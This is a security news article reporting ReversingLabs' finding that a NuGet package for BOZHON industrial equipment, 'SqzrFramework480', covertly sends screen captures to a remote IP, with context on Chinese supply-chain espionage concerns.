Critical Infrastructure Security, Supply chain, Third-party code

Odd NuGet package for industrial equipment raises espionage concerns

A package uploaded to NuGet, a popular open-source .NET package repository, has raised cyberespionage concerns due to its method of continuously exfiltrating screen captures from industrial equipment.

The “SqzrFramework480” package was discovered by ReversingLabs after it was flagged by the company’s Titanium Platform during researchers’ routine threat hunting procedures. ReversingLabs Threat Researcher Petar Kirhmajer published a blog post detailing the research team’s findings on Tuesday.

Uploaded by a user called “zhaoyushun1999” on Jan. 24, the package is a .NET library with a range of functions related to industrial systems such as graphical user interface (GUI) management, machine vision library configuration and robotic movement calibration.

The package appears to be geared toward developers working with equipment manufactured by a company called BOZHON Precision Industry Technology, based on the presence of BOZHON’s logo in the package’s resource header.

BOZHON Precision Industry Technology is a China-based firm that manufactures equipment in the areas of smart warehousing, smart logistics, semiconductors, electric vehicles and consumer electronics. The company’s website lists Microsoft, Samsung, Bosch, LG and Logitech among its customers.

“Open source repositories like NuGet are increasingly hosting suspicious and malicious packages designed to attract developers and trick them into downloading and incorporating malicious libraries and other modules into their development pipelines,” Kirhmajer wrote in the blog post.

“The sheer growth in such supply chain threats – which affect both open source and proprietary software ecosystems – puts the onus on development organizations to apply both caution and scrutiny to any third party code they wish to use, while also continuing to scrutinize internally developed code for potential supply chain risks,” Kirhmajer concluded.

‘SqzrFramework480’ exfiltrates screen captures every 60 seconds

Suspicion regarding the package focuses on an “Init” method included in its code, which performs a looping series of actions that appear designed to extract data from host systems without drawing attention.

The loop runs approximately every 60 seconds and involves opening a socket to connect to a remote IP, taking a screenshot of the system’s primary screen, and sending the screenshot to the remote IP via the socket.

While the ReversingLabs researchers note that there are potential legitimate applications for the function, such as continuous streaming of camera images to a remote workstation, there are additional indicators that the method is designed to remain hidden.

For example, the IP address included in the code is stored as a byte array of ascii-encoded characters that must be dynamically converted to a string using the Encoding.UTF8.GetString method, with no apparent reason why the address could not be stored as a string to begin with.

Additionally, the “GetBytes” method that captures the screen and coverts it to bytes has a non-descriptive name and class name (“BinSerialize”), which makes it less than intuitive for a developer to identify and leverage the method for applications such as camera monitoring.

“The easiest explanation of what we uncovered in the SqzrFramework480 NuGet package is that this is a malicious package created to bait developers that are using Bozhon tools, who would download and run the package without noticing the suspicious GetBytes method,” Kirhmajer wrote.

However, without a “smoking gun” to say without a doubt that the package is intended to be malicious, the researchers opted not to report it to NuGet. The package was still available when the ReversingLabs blog was published on Tuesday, but no longer appeared on the NuGet site by Thursday.

ReversingLabs confirmed to SC Media Thursday afternoon that the package appeared to have been taken down. SC Media reached out to Microsoft, which maintains the NuGet repository, to ask whether the package was removed by staff or by its original creator and did not receive a response.

The package was downloaded more than 2,400 times before it disappeared from the site, according to ReversingLabs.

China-backed supply chain attacks a major concern

The package’s discovery comes amid heightened tensions over China nation-state cyberespionage, with U.S. government officials taking several actions to address security concerns related to hardware and software sourced from China.

Last month, President Joe Biden issued an executive order that included measures for the U.S. Coast Guard to direct cyber risk management actions with regard to ship-to-shore cranes manufactured in China. The U.S. Department of Commerce also launched an investigation last month into national security risks posed by connected vehicles made in China and other “countries of concern.”

Earlier this month, the U.S. House of Representatives approved an act that would require the popular video-sharing app TikTok to divest from its Chinese parent company ByteDance in order to continue operations in the U.S., due to fears that ByteDance could share data on million of U.S. citizens with the Chinese government.

China state-affiliated threat actors have leveraged the software supply chain in their cyberattack campaigns before, with a report by ESET published in early March revealing the threat actor “Elusive Panda” compromised the website of a Tibetan language translation software developer to deploy malicious downloaders.

The ReversingLabs blog states the researchers reached out to BOZHON to ask whether the NuGet account that uploaded the package was affiliated with the company or any of its employees. ReversingLabs told SC Media Thursday that they had not yet heard a response back from the company.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.